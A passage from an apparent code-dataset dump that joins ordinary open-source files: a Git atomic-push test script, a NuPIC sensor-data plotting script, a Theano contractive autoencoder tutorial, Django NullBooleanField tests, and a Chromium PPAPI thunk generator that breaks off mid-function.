mkdir -p upstream/.git/hooks &&
cat >upstream/.git/hooks/update <<-EOF &&
#!/bin/sh
if test "\$1" = "refs/heads/bar"
then
echo >&2 "Pusing to branch bar is prohibited"
exit 1
fi
EOF
chmod a+x upstream/.git/hooks/update
) &&
(
cd workbench &&
test_commit two &&
git branch bar
) &&
test_must_fail git -C workbench \
push --atomic up main two bar >out 2>&1 &&
fmt_status_report <out >actual &&
cat >expect <<-EOF &&
To ../upstream
! [remote rejected] main -> main (atomic push failure)
! [remote rejected] two -> two (atomic push failure)
! [remote rejected] bar -> bar (hook declined)
EOF
test_cmp expect actual
'
# References in upstream : main(1) one(1) foo(1)
# References in workbench: main(2) foo(1) two(2) bar(2)
test_expect_success 'atomic push reports (mirror, but reject by update hook)' '
(
cd workbench &&
git remote remove up &&
git remote add up ../upstream
) &&
test_must_fail git -C workbench \
push --atomic --mirror up >out 2>&1 &&
fmt_status_report <out >actual &&
cat >expect <<-EOF &&
To ../upstream
! [remote rejected] main -> main (atomic push failure)
! [remote rejected] one (atomic push failure)
! [remote rejected] bar -> bar (hook declined)
! [remote rejected] two -> two (atomic push failure)
EOF
test_cmp expect actual
'
# References in upstream : main(2) one(1) foo(1)
# References in workbench: main(1) foo(1) two(2) bar(2)
test_expect_success 'atomic push reports (reject by non-ff)' '
rm upstream/.git/hooks/update &&
(
cd workbench &&
git push up main &&
git reset --hard HEAD^
) &&
test_must_fail git -C workbench \
push --atomic up main foo bar >out 2>&1 &&
fmt_status_report <out >actual &&
cat >expect <<-EOF &&
To ../upstream
! [rejected] main -> main (non-fast-forward)
! [rejected] bar -> bar (atomic push failed)
EOF
test_cmp expect actual
'
test_expect_success 'atomic push reports exit code failure' '
write_script receive-pack-wrapper <<-\EOF &&
git-receive-pack "$@"
exit 1
EOF
test_must_fail git -C workbench push --atomic \
--receive-pack="${SQ}$(pwd)${SQ}/receive-pack-wrapper" \
up HEAD:refs/heads/no-conflict 2>err &&
cat >expect <<-EOF &&
To ../upstream
* [new branch] HEAD -> no-conflict
error: failed to push some refs to ${SQ}../upstream${SQ}
EOF
test_cmp expect err
'
test_expect_success 'atomic push reports exit code failure with porcelain' '
write_script receive-pack-wrapper <<-\EOF &&
git-receive-pack "$@"
exit 1
EOF
test_must_fail git -C workbench push --atomic --porcelain \
--receive-pack="${SQ}$(pwd)${SQ}/receive-pack-wrapper" \
up HEAD:refs/heads/no-conflict-porcelain 2>err &&
cat >expect <<-EOF &&
error: failed to push some refs to ${SQ}../upstream${SQ}
EOF
test_cmp expect err
'
test_done | unknown | github | https://github.com/git/git | t/t5543-atomic-push.sh |
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from htmresearch.frameworks.classification.utils.sensor_data import (
generateSensorData, plotSensorData)
from settings import (SIGNAL_TYPES,
NUM_PHASES,
NUM_REPS,
NUM_CATEGORIES,
WHITE_NOISE_AMPLITUDES,
SIGNAL_AMPLITUDES,
SIGNAL_MEANS,
INPUT_DIR,
NOISE_LENGTHS)
def _generateExpData():
"""
Generate CSV data to plot.
"""
filePaths = []
for signalType in SIGNAL_TYPES:
for noiseAmplitude in WHITE_NOISE_AMPLITUDES:
for signalMean in SIGNAL_MEANS:
for signalAmplitude in SIGNAL_AMPLITUDES:
for numCategories in NUM_CATEGORIES:
for numReps in NUM_REPS:
for numPhases in NUM_PHASES:
for noiseLength in NOISE_LENGTHS:
(expSetup,
numPoints,
filePath) = generateSensorData(signalType,
INPUT_DIR,
numPhases,
numReps,
signalMean,
signalAmplitude,
numCategories,
noiseAmplitude,
noiseLength)
filePaths.append(filePath)
return filePaths
def main():
filePaths = _generateExpData()
plotSensorData(filePaths, xlim=[0, 100])
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
"""This tutorial introduces Contractive auto-encoders (cA) using Theano.
They are based on auto-encoders as the ones used in Bengio et
al. 2007. An autoencoder takes an input x and first maps it to a
hidden representation y = f_{\theta}(x) = s(Wx+b), parameterized by
\theta={W,b}. The resulting latent representation y is then mapped
back to a "reconstructed" vector z \in [0,1]^d in input space z =
g_{\theta'}(y) = s(W'y + b'). The weight matrix W' can optionally be
constrained such that W' = W^T, in which case the autoencoder is said
to have tied weights. The network is trained such that to minimize
the reconstruction error (the error between x and z). Adding the
squared Frobenius norm of the Jacobian of the hidden mapping h with
respect to the visible units yields the contractive auto-encoder:
- \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)]
+ \| \frac{\partial h(x)}{\partial x} \|^2
References :
- S. Rifai, P. Vincent, X. Muller, X. Glorot, Y. Bengio: Contractive
Auto-Encoders: Explicit Invariance During Feature Extraction, ICML-11
- S. Rifai, X. Muller, X. Glorot, G. Mesnil, Y. Bengio, and Pascal
Vincent. Learning invariant features through local space
contraction. Technical Report 1360, Universite de Montreal
- Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise
Training of Deep Networks, Advances in Neural Information Processing
Systems 19, 2007
"""
import os
import sys
import timeit
import numpy
import theano
import theano.tensor as T
from logistic_sgd import load_data
from utils import tile_raster_images
try:
import PIL.Image as Image
except ImportError:
import Image
class cA(object):
""" Contractive Auto-Encoder class (cA)
The contractive autoencoder tries to reconstruct the input with an
additional constraint on the latent space. With the objective of
obtaining a robust representation of the input space, we
regularize the L2 norm(Froebenius) of the jacobian of the hidden
representation with respect to the input. Please refer to Rifai et
al.,2011 for more details.
If x is the input then equation (1) computes the projection of the
input into the latent space h. Equation (2) computes the jacobian
of h with respect to x. Equation (3) computes the reconstruction
of the input, while equation (4) computes the reconstruction
error and the added regularization term from Eq.(2).
.. math::
h_i = s(W_i x + b_i) (1)
J_i = h_i (1 - h_i) * W_i (2)
x' = s(W' h + b') (3)
L = -sum_{k=1}^d [x_k \log x'_k + (1-x_k) \log( 1-x'_k)]
+ lambda * sum_{i=1}^d sum_{j=1}^n J_{ij}^2 (4)
"""
def __init__(self, numpy_rng, input=None, n_visible=784, n_hidden=100,
n_batchsize=1, W=None, bhid=None, bvis=None):
"""Initialize the cA class by specifying the number of visible units
(the dimension d of the input), the number of hidden units (the
dimension d' of the latent or hidden space) and the contraction level.
The constructor also receives symbolic variables for the input, weights
and bias.
:type numpy_rng: numpy.random.RandomState
:param numpy_rng: number random generator used to generate weights
:type theano_rng: theano.tensor.shared_randomstreams.RandomStreams
:param theano_rng: Theano random generator; if None is given
one is generated based on a seed drawn from `rng`
:type input: theano.tensor.TensorType
:param input: a symbolic description of the input or None for
standalone cA
:type n_visible: int
:param n_visible: number of visible units
:type n_hidden: int
:param n_hidden: number of hidden units
:type n_batchsize int
:param n_batchsize: number of examples per batch
:type W: theano.tensor.TensorType
:param W: Theano variable pointing to a set of weights that should be
shared belong the dA and another architecture; if dA should
be standalone set this to None
:type bhid: theano.tensor.TensorType
:param bhid: Theano variable pointing to a set of biases values (for
hidden units) that should be shared belong dA and another
architecture; if dA should be standalone set this to None
:type bvis: theano.tensor.TensorType
:param bvis: Theano variable pointing to a set of biases values (for
visible units) that should be shared belong dA and another
architecture; if dA should be standalone set this to None
"""
self.n_visible = n_visible
self.n_hidden = n_hidden
self.n_batchsize = n_batchsize
# note : W' was written as `W_prime` and b' as `b_prime`
if not W:
# W is initialized with `initial_W` which is uniformely sampled
# from -4*sqrt(6./(n_visible+n_hidden)) and
# 4*sqrt(6./(n_hidden+n_visible))the output of uniform if
# converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
initial_W = numpy.asarray(
numpy_rng.uniform(
low=-4 * numpy.sqrt(6. / (n_hidden + n_visible)),
high=4 * numpy.sqrt(6. / (n_hidden + n_visible)),
size=(n_visible, n_hidden)
),
dtype=theano.config.floatX
)
W = theano.shared(value=initial_W, name='W', borrow=True)
if not bvis:
bvis = theano.shared(value=numpy.zeros(n_visible,
dtype=theano.config.floatX),
borrow=True)
if not bhid:
bhid = theano.shared(value=numpy.zeros(n_hidden,
dtype=theano.config.floatX),
name='b',
borrow=True)
self.W = W
# b corresponds to the bias of the hidden
self.b = bhid
# b_prime corresponds to the bias of the visible
self.b_prime = bvis
# tied weights, therefore W_prime is W transpose
self.W_prime = self.W.T
# if no input is given, generate a variable representing the input
if input is None:
# we use a matrix because we expect a minibatch of several
# examples, each example being a row
self.x = T.dmatrix(name='input')
else:
self.x = input
self.params = [self.W, self.b, self.b_prime]
def get_hidden_values(self, input):
""" Computes the values of the hidden layer """
return T.nnet.sigmoid(T.dot(input, self.W) + self.b)
def get_jacobian(self, hidden, W):
"""Computes the jacobian of the hidden layer with respect to
the input, reshapes are necessary for broadcasting the
element-wise product on the right axis
"""
return T.reshape(hidden * (1 - hidden),
(self.n_batchsize, 1, self.n_hidden)) * T.reshape(
W, (1, self.n_visible, self.n_hidden))
def get_reconstructed_input(self, hidden):
"""Computes the reconstructed input given the values of the
hidden layer
"""
return T.nnet.sigmoid(T.dot(hidden, self.W_prime) + self.b_prime)
def get_cost_updates(self, contraction_level, learning_rate):
""" This function computes the cost and the updates for one trainng
step of the cA """
y = self.get_hidden_values(self.x)
z = self.get_reconstructed_input(y)
J = self.get_jacobian(y, self.W)
# note : we sum over the size of a datapoint; if we are using
# minibatches, L will be a vector, with one entry per
# example in minibatch
self.L_rec = - T.sum(self.x * T.log(z) +
(1 - self.x) * T.log(1 - z),
axis=1)
# Compute the jacobian and average over the number of samples/minibatch
self.L_jacob = T.sum(J ** 2) / self.n_batchsize
# note : L is now a vector, where each element is the
# cross-entropy cost of the reconstruction of the
# corresponding example of the minibatch. We need to
# compute the average of all these to get the cost of
# the minibatch
cost = T.mean(self.L_rec) + contraction_level * T.mean(self.L_jacob)
# compute the gradients of the cost of the `cA` with respect
# to its parameters
gparams = T.grad(cost, self.params)
# generate the list of updates
updates = []
for param, gparam in zip(self.params, gparams):
updates.append((param, param - learning_rate * gparam))
return (cost, updates)
def test_cA(learning_rate=0.01, training_epochs=20,
dataset='mnist.pkl.gz',
batch_size=10, output_folder='cA_plots', contraction_level=.1):
"""
This demo is tested on MNIST
:type learning_rate: float
:param learning_rate: learning rate used for training the contracting
AutoEncoder
:type training_epochs: int
:param training_epochs: number of epochs used for training
:type dataset: string
:param dataset: path to the picked dataset
"""
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
x = T.matrix('x') # the data is presented as rasterized images
if not os.path.isdir(output_folder):
os.makedirs(output_folder)
os.chdir(output_folder)
####################################
# BUILDING THE MODEL #
####################################
rng = numpy.random.RandomState(123)
ca = cA(numpy_rng=rng, input=x,
n_visible=28 * 28, n_hidden=500, n_batchsize=batch_size)
cost, updates = ca.get_cost_updates(contraction_level=contraction_level,
learning_rate=learning_rate)
train_ca = theano.function(
[index],
[T.mean(ca.L_rec), ca.L_jacob],
updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size]
}
)
start_time = timeit.default_timer()
############
# TRAINING #
############
# go through training epochs
for epoch in xrange(training_epochs):
# go through trainng set
c = []
for batch_index in xrange(n_train_batches):
c.append(train_ca(batch_index))
c_array = numpy.vstack(c)
print 'Training epoch %d, reconstruction cost ' % epoch, numpy.mean(
c_array[0]), ' jacobian norm ', numpy.mean(numpy.sqrt(c_array[1]))
end_time = timeit.default_timer()
training_time = (end_time - start_time)
print >> sys.stderr, ('The code for file ' + os.path.split(__file__)[1] +
' ran for %.2fm' % ((training_time) / 60.))
image = Image.fromarray(tile_raster_images(
X=ca.W.get_value(borrow=True).T,
img_shape=(28, 28), tile_shape=(10, 10),
tile_spacing=(1, 1)))
image.save('cae_filters.png')
os.chdir('../')
if __name__ == '__main__':
test_cA() | unknown | codeparrot/codeparrot-clean | ||
from __future__ import unicode_literals
from django.forms import Form, HiddenInput, NullBooleanField, RadioSelect
from django.test import SimpleTestCase
from . import FormFieldAssertionsMixin
class NullBooleanFieldTest(FormFieldAssertionsMixin, SimpleTestCase):
def test_nullbooleanfield_clean(self):
f = NullBooleanField()
self.assertIsNone(f.clean(''))
self.assertTrue(f.clean(True))
self.assertFalse(f.clean(False))
self.assertIsNone(f.clean(None))
self.assertFalse(f.clean('0'))
self.assertTrue(f.clean('1'))
self.assertIsNone(f.clean('2'))
self.assertIsNone(f.clean('3'))
self.assertIsNone(f.clean('hello'))
self.assertTrue(f.clean('true'))
self.assertFalse(f.clean('false'))
def test_nullbooleanfield_2(self):
# The internal value is preserved if using HiddenInput (#7753).
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm()
self.assertHTMLEqual(
'<input type="hidden" name="hidden_nullbool1" value="True" id="id_hidden_nullbool1" />'
'<input type="hidden" name="hidden_nullbool2" value="False" id="id_hidden_nullbool2" />',
str(f)
)
def test_nullbooleanfield_3(self):
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm({'hidden_nullbool1': 'True', 'hidden_nullbool2': 'False'})
self.assertIsNone(f.full_clean())
self.assertTrue(f.cleaned_data['hidden_nullbool1'])
self.assertFalse(f.cleaned_data['hidden_nullbool2'])
def test_nullbooleanfield_4(self):
# Make sure we're compatible with MySQL, which uses 0 and 1 for its
# boolean values (#9609).
NULLBOOL_CHOICES = (('1', 'Yes'), ('0', 'No'), ('', 'Unknown'))
class MySQLNullBooleanForm(Form):
nullbool0 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool1 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool2 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
f = MySQLNullBooleanForm({'nullbool0': '1', 'nullbool1': '0', 'nullbool2': ''})
self.assertIsNone(f.full_clean())
self.assertTrue(f.cleaned_data['nullbool0'])
self.assertFalse(f.cleaned_data['nullbool1'])
self.assertIsNone(f.cleaned_data['nullbool2'])
def test_nullbooleanfield_changed(self):
f = NullBooleanField()
self.assertTrue(f.has_changed(False, None))
self.assertTrue(f.has_changed(None, False))
self.assertFalse(f.has_changed(None, None))
self.assertFalse(f.has_changed(False, False))
self.assertTrue(f.has_changed(True, False))
self.assertTrue(f.has_changed(True, None))
self.assertTrue(f.has_changed(True, False))
# HiddenInput widget sends string values for boolean but doesn't clean them in value_from_datadict
self.assertFalse(f.has_changed(False, 'False'))
self.assertFalse(f.has_changed(True, 'True'))
self.assertFalse(f.has_changed(None, ''))
self.assertTrue(f.has_changed(False, 'True'))
self.assertTrue(f.has_changed(True, 'False'))
self.assertTrue(f.has_changed(None, 'False')) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Generator for C++ style thunks """
import glob
import os
import re
import sys
from idl_log import ErrOut, InfoOut, WarnOut
from idl_node import IDLAttribute, IDLNode
from idl_ast import IDLAst
from idl_option import GetOption, Option, ParseOptions
from idl_outfile import IDLOutFile
from idl_parser import ParseFiles
from idl_c_proto import CGen, GetNodeComments, CommentLines, Comment
from idl_generator import Generator, GeneratorByFile
Option('thunkroot', 'Base directory of output',
default=os.path.join('..', 'thunk'))
class TGenError(Exception):
def __init__(self, msg):
self.value = msg
def __str__(self):
return repr(self.value)
class ThunkBodyMetadata(object):
"""Metadata about thunk body. Used for selecting which headers to emit."""
def __init__(self):
self._apis = set()
self._builtin_includes = set()
self._includes = set()
def AddApi(self, api):
self._apis.add(api)
def Apis(self):
return self._apis
def AddInclude(self, include):
self._includes.add(include)
def Includes(self):
return self._includes
def AddBuiltinInclude(self, include):
self._builtin_includes.add(include)
def BuiltinIncludes(self):
return self._builtin_includes
def _GetBaseFileName(filenode):
"""Returns the base name for output files, given the filenode.
Examples:
'dev/ppb_find_dev.h' -> 'ppb_find_dev'
'trusted/ppb_buffer_trusted.h' -> 'ppb_buffer_trusted'
"""
path, name = os.path.split(filenode.GetProperty('NAME'))
name = os.path.splitext(name)[0]
return name
def _GetHeaderFileName(filenode):
"""Returns the name for the header for this file."""
path, name = os.path.split(filenode.GetProperty('NAME'))
name = os.path.splitext(name)[0]
if path:
header = "ppapi/c/%s/%s.h" % (path, name)
else:
header = "ppapi/c/%s.h" % name
return header
def _GetThunkFileName(filenode, relpath):
"""Returns the thunk file name."""
path = os.path.split(filenode.GetProperty('NAME'))[0]
name = _GetBaseFileName(filenode)
# We don't reattach the path for thunk.
if relpath: name = os.path.join(relpath, name)
name = '%s%s' % (name, '_thunk.cc')
return name
def _StripFileName(filenode):
"""Strips path and dev, trusted, and private suffixes from the file name."""
api_basename = _GetBaseFileName(filenode)
if api_basename.endswith('_dev'):
api_basename = api_basename[:-len('_dev')]
if api_basename.endswith('_trusted'):
api_basename = api_basename[:-len('_trusted')]
if api_basename.endswith('_private'):
api_basename = api_basename[:-len('_private')]
return api_basename
def _StripApiName(api_name):
"""Strips Dev, Private, and Trusted suffixes from the API name."""
if api_name.endswith('Trusted'):
api_name = api_name[:-len('Trusted')]
if api_name.endswith('_Dev'):
api_name = api_name[:-len('_Dev')]
if api_name.endswith('_Private'):
api_name = api_name[:-len('_Private')]
return api_name
def _MakeEnterLine(filenode, interface, member, arg, handle_errors, callback,
meta):
"""Returns an EnterInstance/EnterResource string for a function."""
api_name = _StripApiName(interface.GetName()) + '_API'
if member.GetProperty('api'): # Override API name.
manually_provided_api = True
# TODO(teravest): Automatically guess the API header file.
api_name = member.GetProperty('api')
else:
manually_provided_api = False
if arg[0] == 'PP_Instance':
if callback is None:
arg_string = arg[1]
else:
arg_string = '%s, %s' % (arg[1], callback)
if interface.GetProperty('singleton') or member.GetProperty('singleton'):
if not manually_provided_api:
meta.AddApi('ppapi/thunk/%s_api.h' % _StripFileName(filenode))
return 'EnterInstanceAPI<%s> enter(%s);' % (api_name, arg_string)
else:
return 'EnterInstance enter(%s);' % arg_string
elif arg[0] == 'PP_Resource':
enter_type = 'EnterResource<%s>' % api_name
if not manually_provided_api:
meta.AddApi('ppapi/thunk/%s_api.h' % _StripFileName(filenode))
if callback is None:
return '%s enter(%s, %s);' % (enter_type, arg[1],
str(handle_errors).lower())
else:
return '%s enter(%s, %s, %s);' % (enter_type, arg[1],
callback,
str(handle_errors).lower())
else:
raise TGenError("Unknown type for _MakeEnterLine: %s" % arg[0])
def _GetShortName(interface, filter_suffixes):
"""Return a shorter interface name that matches Is* and Create* functions."""
parts = interface.GetName().split('_')[1:]
tail = parts[len(parts) - 1]
if tail in filter_suffixes:
parts = parts[:-1]
return ''.join(parts)
def _IsTypeCheck(interface, node, args):
"""Returns true if node represents a type-checking function."""
if len(args) == 0 or args[0][0] != 'PP_Resource':
return False
return node.GetName() == 'Is%s' % _GetShortName(interface, ['Dev', 'Private'])
def _GetCreateFuncName(interface):
"""Returns the creation function name for an interface."""
return 'Create%s' % _GetShortName(interface, ['Dev'])
def _GetDefaultFailureValue(t):
"""Returns the default failure value for a given type.
Returns None if no default failure value exists for the type.
"""
values = {
'PP_Bool': 'PP_FALSE',
'PP_Resource': '0',
'struct PP_Var': 'PP_MakeUndefined()',
'float': '0.0f',
'int32_t': 'enter.retval()',
'uint16_t': '0',
'uint32_t': '0',
'uint64_t': '0',
'void*': 'NULL'
}
if t in values:
return values[t]
return None
def _MakeCreateMemberBody(interface, member, args):
"""Returns the body of a Create() function.
Args:
interface - IDLNode for the interface
member - IDLNode for member function
args - List of arguments for the Create() function
"""
if args[0][0] == 'PP_Resource':
body = 'Resource* object =\n'
body += ' PpapiGlobals::Get()->GetResourceTracker()->'
body += 'GetResource(%s);\n' % args[0][1]
body += 'if (!object)\n'
body += ' return 0;\n'
body += 'EnterResourceCreation enter(object->pp_instance());\n'
elif args[0][0] == 'PP_Instance':
body = 'EnterResourceCreation enter(%s);\n' % args[0][1]
else:
raise TGenError('Unknown arg type for Create(): %s' % args[0][0])
body += 'if (enter.failed())\n'
body += ' return 0;\n'
arg_list = ', '.join([a[1] for a in args])
if member.GetProperty('create_func'):
create_func = member.GetProperty('create_func')
else:
create_func = _GetCreateFuncName(interface)
body += 'return enter.functions()->%s(%s);' % (create_func,
arg_list)
return body
def _GetOutputParams(member, release):
"""Returns output parameters (and their types) for a member function.
Args:
member - IDLNode for the member function
release - Release to get output parameters for
Returns:
A list of name strings for all output parameters of the member
function.
"""
out_params = []
callnode = member.GetOneOf('Callspec')
if callnode:
cgen = CGen()
for param in callnode.GetListOf('Param'):
mode = cgen.GetParamMode(param)
if mode == 'out':
# We use the 'store' mode when getting the parameter type, since we
# need to call sizeof() for memset().
_, pname, _, _ = cgen.GetComponents(param, release, 'store')
out_params.append(pname)
return out_params
def _MakeNormalMemberBody(filenode, release, node, member, rtype, args,
include_version, meta):
"""Returns the body of a typical function.
Args:
filenode - IDLNode for the file
release - release to generate body for
node - IDLNode for the interface
member - IDLNode for the member function
rtype - Return type for the member function
args - List of 4-tuple arguments for the member function
include_version - whether to include the version in the invocation
meta - ThunkBodyMetadata for header hints
"""
if len(args) == 0:
# Calling into the "Shared" code for the interface seems like a reasonable
# heuristic when we don't have any arguments; some thunk code follows this
# convention today.
meta.AddApi('ppapi/shared_impl/%s_shared.h' % _StripFileName(filenode))
return 'return %s::%s();' % (_StripApiName(node.GetName()) + '_Shared',
member.GetName())
is_callback_func = args[len(args) - 1][0] == 'struct PP_CompletionCallback'
if is_callback_func:
call_args = args[:-1] + [('', 'enter.callback()', '', '')]
meta.AddInclude('ppapi/c/pp_completion_callback.h')
else:
call_args = args
if args[0][0] == 'PP_Instance':
call_arglist = ', '.join(a[1] for a in call_args)
function_container = 'functions'
elif args[0][0] == 'PP_Resource':
call_arglist = ', '.join(a[1] for a in call_args[1:])
function_container = 'object'
else:
# Calling into the "Shared" code for the interface seems like a reasonable
# heuristic when the first argument isn't a PP_Instance or a PP_Resource;
# some thunk code follows this convention today.
meta.AddApi('ppapi/shared_impl/%s_shared.h' % _StripFileName(filenode))
return 'return %s::%s(%s);' % (_StripApiName(node.GetName()) + '_Shared',
member.GetName(),
', '.join(a[1] for a in args))
function_name = member.GetName()
if include_version:
version = node.GetVersion(release).replace('.', '_')
function_name += version
invocation = 'enter.%s()->%s(%s)' % (function_container,
function_name,
call_arglist)
handle_errors = not (member.GetProperty('report_errors') == 'False')
out_params = _GetOutputParams(member, release)
if is_callback_func:
body = '%s\n' % _MakeEnterLine(filenode, node, member, args[0],
handle_errors, args[len(args) - 1][1], meta)
failure_value = member.GetProperty('on_failure')
if failure_value is None:
failure_value = 'enter.retval()'
failure_return = 'return %s;' % failure_value
success_return = 'return enter.SetResult(%s);' % invocation
elif rtype == 'void':
body = '%s\n' % _MakeEnterLine(filenode, node, member, args[0],
handle_errors, None, meta)
failure_return = 'return;'
success_return = '%s;' % invocation # We don't return anything for void.
else:
body = '%s\n' % _MakeEnterLine(filenode, node, member, args[0],
handle_errors, None, meta)
failure_value = member.GetProperty('on_failure')
if failure_value is None:
failure_value = _GetDefaultFailureValue(rtype)
if failure_value is None:
raise TGenError('There is no default value for rtype %s. '
'Maybe you should provide an on_failure attribute '
'in the IDL file.' % rtype)
failure_return = 'return %s;' % failure_value
success_return = 'return %s;' % invocation
if member.GetProperty('always_set_output_parameters'):
body += 'if (enter.failed()) {\n'
for param in out_params:
body += ' memset(%s, 0, sizeof(*%s));\n' % (param, param)
body += ' %s\n' % failure_return
body += '}\n'
body += '%s' % success_return
meta.AddBuiltinInclude('string.h')
else:
body += 'if (enter.failed())\n'
body += ' %s\n' % failure_return
body += '%s' % success_return
return body
def DefineMember(filenode, node, member, release, include_version, meta):
"""Returns a definition for a member function of an interface.
Args:
filenode - IDLNode for the file
node - IDLNode for the interface
member - IDLNode for the member function
release - release to generate
include_version - include the version in emitted function name.
meta - ThunkMetadata for header hints
Returns:
A string with the member definition.
"""
cgen = CGen()
rtype, name, arrays, args = cgen.GetComponents(member, release, 'return')
log_body = '\"%s::%s()\";' % (node.GetName(),
cgen.GetStructName(member, release,
include_version))
if len(log_body) > 69: # Prevent lines over 80 characters.
body = 'VLOG(4) <<\n'
body += ' %s\n' % log_body
else:
body = 'VLOG(4) << %s\n' % log_body
if _IsTypeCheck(node, member, args):
body += '%s\n' % _MakeEnterLine(filenode, node, member, args[0], False,
None, meta)
body += 'return PP_FromBool(enter.succeeded());'
elif member.GetName() == 'Create' or member.GetName() == 'CreateTrusted':
body += _MakeCreateMemberBody(node, member, args)
else:
body += _MakeNormalMemberBody(filenode, release, node, member, rtype, args,
include_version, meta)
signature = cgen.GetSignature(member, release, 'return', func_as_ptr=False,
include_version=include_version)
return '%s\n%s\n}' % (cgen.Indent('%s {' % signature, tabs=0),
cgen.Indent(body, tabs=1))
def _IsNewestMember(member, members, releases):
"""Returns true if member is the newest node with its name in members.
Currently, every node in the AST only has one version. This means that we
will have two sibling nodes with the same name to represent different
versions.
See http://crbug.com/157017 .
Special handling is required for nodes which share their name with others,
but aren't the newest version in the IDL.
Args:
member - The member which is checked if it's newest
members - The list of members to inspect
releases - The set of releases to check for versions in.
"""
build_list = member.GetUniqueReleases(releases)
release = build_list[0] # Pick the oldest release.
same_name_siblings = filter(
lambda n: str(n) == str(member) and n != member, members)
for s in same_name_siblings:
sibling_build_list = s.GetUniqueReleases(releases)
sibling_release = sibling_build_list[0]
if sibling_release > release:
return False
return True
class TGen(GeneratorByFile):
def __init__(self):
Generator.__init__(self, 'Thunk', 'tgen', 'Generate the C++ thunk.')
def GenerateFile(self, filenode, releases, options):
savename = _GetThunkFileName(filenode, GetOption('thunkroot'))
my_min, my_max = filenode.GetMinMax(releases)
if my_min > releases[-1] or my_max < releases[0]:
if os.path.isfile(savename):
print "Removing stale %s for this range." % filenode.GetName()
os.remove(os.path.realpath(savename))
return False
do_generate = filenode.GetProperty('generate_thunk')
if not do_generate:
return False
thunk_out = IDLOutFile(savename)
body, meta = self.GenerateBody(thunk_out, filenode, releases, options)
# TODO(teravest): How do we handle repeated values?
if filenode.GetProperty('thunk_include'):
meta.AddInclude(filenode.GetProperty('thunk_include'))
self.WriteHead(thunk_out, filenode, releases, options, meta)
thunk_out.Write('\n\n'.join(body))
self.WriteTail(thunk_out, filenode, releases, options)
thunk_out.ClangFormat()
return thunk_out.Close()
def WriteHead(self, out, filenode, releases, options, meta):
__pychecker__ = 'unusednames=options'
cgen = CGen()
cright_node = filenode.GetChildren()[0]
assert(cright_node.IsA('Copyright'))
out.Write('%s\n' % cgen.Copyright(cright_node, cpp_style=True))
from_text = 'From %s' % (
filenode.GetProperty('NAME').replace(os.sep,'/'))
modified_text = 'modified %s.' % (
filenode.GetProperty('DATETIME'))
out.Write('// %s %s\n\n' % (from_text, modified_text))
if meta.BuiltinIncludes():
for include in sorted(meta.BuiltinIncludes()):
out.Write('#include <%s>\n' % include)
out.Write('\n')
# TODO(teravest): Don't emit includes we don't need.
includes = ['ppapi/c/pp_errors.h',
'ppapi/shared_impl/tracked_callback.h',
'ppapi/thunk/enter.h',
'ppapi/thunk/ppapi_thunk_export.h']
includes.append(_GetHeaderFileName(filenode))
for api in meta.Apis():
includes.append('%s' % api.lower())
for i in meta.Includes():
includes.append(i)
for include in sorted(includes):
out.Write('#include "%s"\n' % include)
out.Write('\n')
out.Write('namespace ppapi {\n')
out.Write('namespace thunk {\n')
out.Write('\n')
out.Write('namespace {\n')
out.Write('\n')
def GenerateBody(self, out, filenode, releases, options):
"""Generates a member function lines to be written and metadata.
Returns a tuple of (body, meta) where:
body - a list of lines with member function bodies
meta - a ThunkMetadata instance for hinting which headers are needed.
"""
__pychecker__ = 'unusednames=options'
out_members = []
meta = ThunkBodyMetadata()
for node in filenode.GetListOf('Interface'):
# Skip if this node is not in this release
if not node.InReleases(releases):
print "Skipping %s" % node
continue
# Generate Member functions
if node.IsA('Interface'):
members = node.GetListOf('Member')
for child in members:
build_list = child.GetUniqueReleases(releases)
# We have to filter out releases this node isn't in.
build_list = filter(lambda r: child.InReleases([r]), build_list)
if len(build_list) == 0:
continue
release = build_list[-1]
include_version = not _IsNewestMember(child, members, releases)
member = DefineMember(filenode, node, child, release, include_version,
meta)
if not member:
continue
out_members.append(member)
return (out_members, meta)
def WriteTail(self, out, filenode, releases, options):
__pychecker__ = 'unusednames=options'
cgen = CGen()
version_list = []
out.Write('\n\n')
for node in filenode.GetListOf('Interface'):
build_list = node.GetUniqueReleases(releases)
for build in build_list:
version = node.GetVersion(build).replace('.', '_')
thunk_name = 'g_' + node.GetName().lower() + '_thunk_' + \
version
thunk_type = '_'.join((node.GetName(), version))
version_list.append((thunk_type, thunk_name))
out.Write('const %s %s = {\n' % (thunk_type, thunk_name))
generated_functions = []
members = node.GetListOf('Member')
for child in members:
rtype, name, arrays, args = cgen.GetComponents(
child, build, 'return')
if child.InReleases([build]):
if not _IsNewestMember(child, members, releases):
version = child.GetVersion(
